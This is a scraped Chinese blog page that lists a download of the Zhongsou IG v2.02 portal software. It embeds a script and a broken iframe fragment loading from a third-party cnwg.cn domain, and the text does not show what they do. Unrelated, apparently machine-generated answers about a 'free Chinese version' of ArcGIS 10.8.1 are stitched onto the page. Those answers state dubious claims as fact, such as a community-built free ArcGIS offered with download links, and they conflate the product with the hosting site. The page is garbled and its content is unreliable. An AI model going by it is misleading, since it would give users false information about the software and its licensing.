中搜ig v2.02 完整版 绿色

Welcome to my blog!
<script language="javascript" src="http://avss.b15.cnwg.cn/count/count.asp"></script>
中搜ig v2.02 完整版<||>





软件大小:

7113 KB



软件语言:

简体中文



软件类别:

国产软件 / 免费版 / 搜索引擎



应用平台:

Win9x/NT/2000/XP/2003



界面预览:








插件情况:


 



投诉







更新时间:

2007-01-27 16:10:19



下载次数:

474563



推荐等级:






联 系 人:


chujc
zhongsou.com




开 发 商:中搜ig v2.02 完整版>作者空间:






    IG是一个集成了浏览器、视频下载、聊天、查找邮件、信息定制功能的个人互联网门户(internet gateway)软件。
IG的浏览器是一个高度可定制的强大Web浏览器,可同时打开多个子窗口同时浏览不同的网页,个数不限,且极省资源。
视频下载采用最新的飞影下载-3,基于P2P的设计思路保证下载速度快,同时新技术使产品更有穿透性,可以与全世界的网友共同分享资源,充分享受自由共享的乐趣!
信息订制功能保证在第一时间将所关注的信息发送到桌面上。真正做到电脑屏前坐便知天下事。
IG聊天功能包含主流的MSN、QQ已经IG聊天,能做到同时开启,同时支持视频聊天,图片传输等功能,同时节约系统资源和减少操作。
针对不同的用户群体习惯还设置了经典、白领、女性等个性化的版本界面以供选择,在高效冲浪同时还能最大限度体现个性。
绿色
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: ArcGIS v10.8.1 文免费版 CSDN是一个地理信息系统软件,是由Esri公司开发的,可以帮助用户创建、管理和分析地理数据。它能够帮助用户在地图呈现和分析数据,为用户提供深入的洞察和理解地理相关的问题。 ArcGIS v10.8.1 文免费版 CSDN提供了完整的数据管理工具,可帮助用户管理和整理地理、CAD和表格数据,并通过应用不同的分析方法,得出更有价值的洞察和信息。用户可快速制作高质量地图和视觉化成果,从而深入了解和分析地理数据。 对于初学者来说,ArcGIS v10.8.1 文免费版 CSDN提供了简单易用的用户界面,可帮助用户迅速上手。另外,它还提供了详细的说明文档和视频教程,可帮助用户深入了解该软件的所有功能和应用。 总而言之,ArcGIS v10.8.1 文免费版 CSDN是一个强大的地理信息系统软件,为用户提供了创建、管理和分析地理数据的多种工具和功能,帮助用户从地理数据获得更多深入洞察。 ### 回答2: ArcGIS v10.8.1是由美国ESRI公司开发的一款高级地理信息系统软件。它可以处理、分析和解释地理数据,帮助用户更好地了解地球表面和其上的现象,以及进行探索和决策。该软件在许多行业都有广泛的应用,包括资源管理、市政管理、国土规划、环境保护、灾害管理等等。 在国,除了商业版的ArcGIS外,还有一种名为“ArcGIS文免费版”的软件。这款软件是由文用户自己开发的,基于ArcGIS Engine技术,社区免费共享。其主要功能与ArcGIS商业版类似,包括地图制作、数据处理、空间分析、地理编码、三维可视化等等。同时,它还加入了一些本土化的功能,比如支持国内多种坐标系统和地图投影,增加了电子地图数据等等,更贴近国用户的需求。 针对这款软件,CSDN平台上也有很多相关的教程和资源,供用户参考。可以通过CSDN索“ArcGIS文免费版”等关键字,找到相应的学习材料和下载链接。同时,在CSDN社区也能找到一些ArcGIS相关的技术交流贴和问答帖,方便用户在使用遇到问题时得到解答。总之,ArcGIS文免费版是一款非常有价值的软件,对于学习和实践GIS技术的用户来说,可以免费获取到一部分ArcGIS功能和资源,更好地体验和掌握这个领域的知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值